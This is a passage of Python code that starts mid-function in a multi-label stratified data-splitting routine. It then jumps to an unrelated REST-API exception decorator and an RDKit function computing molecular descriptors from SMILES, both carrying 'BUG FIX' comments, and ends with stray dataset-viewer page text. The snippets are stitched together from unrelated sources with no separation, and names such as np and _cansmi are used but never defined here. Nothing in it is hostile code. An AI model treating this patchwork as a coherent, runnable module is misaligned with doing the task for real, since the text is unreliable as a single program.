        c: [r * len(per_label_data[c]) for r in ratios]
        for c in classes
    }
    # For each subset we want, the set of sample-ids which should end up in it
    stratified_data_ids = [set() for _ in range(len(ratios))]
    # Greedy loop: repeatedly distribute all samples of the rarest
    # remaining label, always to the subset most in need of it.
    # For each sample in the data set
    while size > 0:
        # Compute |Di|
        lengths = {
            l: len(label_data)
            for l, label_data in per_label_data.items()
        }
        try:
            # Find label of smallest |Di|
            label = min(
                {k: v for k, v in lengths.items() if v > 0}, key=lengths.get
            )
        except ValueError:
            # If the dictionary in `min` is empty we get a Value Error.
            # This can happen if there are unlabeled samples.
            # In this case, `size` would be > 0 but only samples without label would remain.
            # "No label" could be a class in itself: it's up to you to format your data accordingly.
            break
        current_length = lengths[label]
        # For each sample with label `label`
        while per_label_data[label]:
            # Select such a sample
            current_id = per_label_data[label].pop()
            subset_sizes_for_label = per_label_subset_sizes[label]
            # Find argmax clj i.e. subset in greatest need of the current label
            largest_subsets = np.argwhere(
                subset_sizes_for_label == np.amax(subset_sizes_for_label)
            ).flatten()
            if len(largest_subsets) == 1:
                subset = largest_subsets[0]
            # If there is more than one such subset, find the one in greatest need
            # of any label
            else:
                largest_subsets = np.argwhere(
                    subset_sizes == np.amax(subset_sizes)
                ).flatten()
                if len(largest_subsets) == 1:
                    subset = largest_subsets[0]
                else:
                    # If there is more than one such subset, choose at random
                    subset = np.random.choice(largest_subsets)
            # Store the sample's id in the selected subset
            stratified_data_ids[subset].add(current_id)
            # There is one fewer sample to distribute
            size -= 1
            # The selected subset needs one fewer sample
            subset_sizes[subset] -= 1
            # In the selected subset, there is one more example for each label
            # the current sample has
            for l in data[current_id]:
                per_label_subset_sizes[l][subset] -= 1
            # Remove the sample from the dataset, meaning from all per_label dataset created
            for l, label_data in per_label_data.items():
                if current_id in label_data:
                    label_data.remove(current_id)
    # Create the stratified dataset as a list of subsets, each containing the orginal labels
    stratified_data_ids = [sorted(strat) for strat in stratified_data_ids]
    stratified_data = [
        [data[i] for i in strat] for strat in stratified_data_ids
    ]
    # Return both the stratified indexes, to be used to sample the `features` associated with your labels
    # And the stratified labels dataset
    return stratified_data_ids, stratified_data
def handle_request(fun):
    """
    Exception treatment for the REST API calls

    Decorator: any exception raised by the wrapped handler is logged and
    re-raised as a ClientSideError; server-side errors are taken care of
    through response codes.
    """
    import functools

    # BUG FIX: without functools.wraps the wrapper hid the handler's
    # __name__/__doc__, breaking introspection and routing metadata.
    @functools.wraps(fun)
    def wrapper(self, *args, **kwargs):
        """
        We raise an exception when
        the code on the client side fails
        Server side errors are taken care of
        through response codes
        """
        try:
            return fun(self, *args, **kwargs)
        except Exception as req_exception:
            self.logger.exception("internal error")
            raise ClientSideError(str(req_exception))
    return wrapper
from rdkit.ML.Descriptors import MoleculeDescriptors
from rdkit import Chem
from rdkit.Chem import Descriptors
def compDesc(smiles):
    """Compute all RDKit molecular descriptors for a SMILES string.

    :param smiles: SMILES representation of the molecule.
    :return: Tuple of descriptor values, or None when canonicalisation,
        parsing or descriptor calculation fails.
    """
    descriptors = list(np.array(Descriptors._descList)[:, 0])
    calculator = MoleculeDescriptors.MolecularDescriptorCalculator(descriptors)
    try:
        cansmi = _cansmi(smiles)
        mol = Chem.MolFromSmiles(cansmi)
        res = calculator.CalcDescriptors(mol)
    except Exception:
        # BUG FIX: narrowed from a bare `except:`, which also swallowed
        # KeyboardInterrupt/SystemExit; chemistry failures still yield None.
        res = None
    return res
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.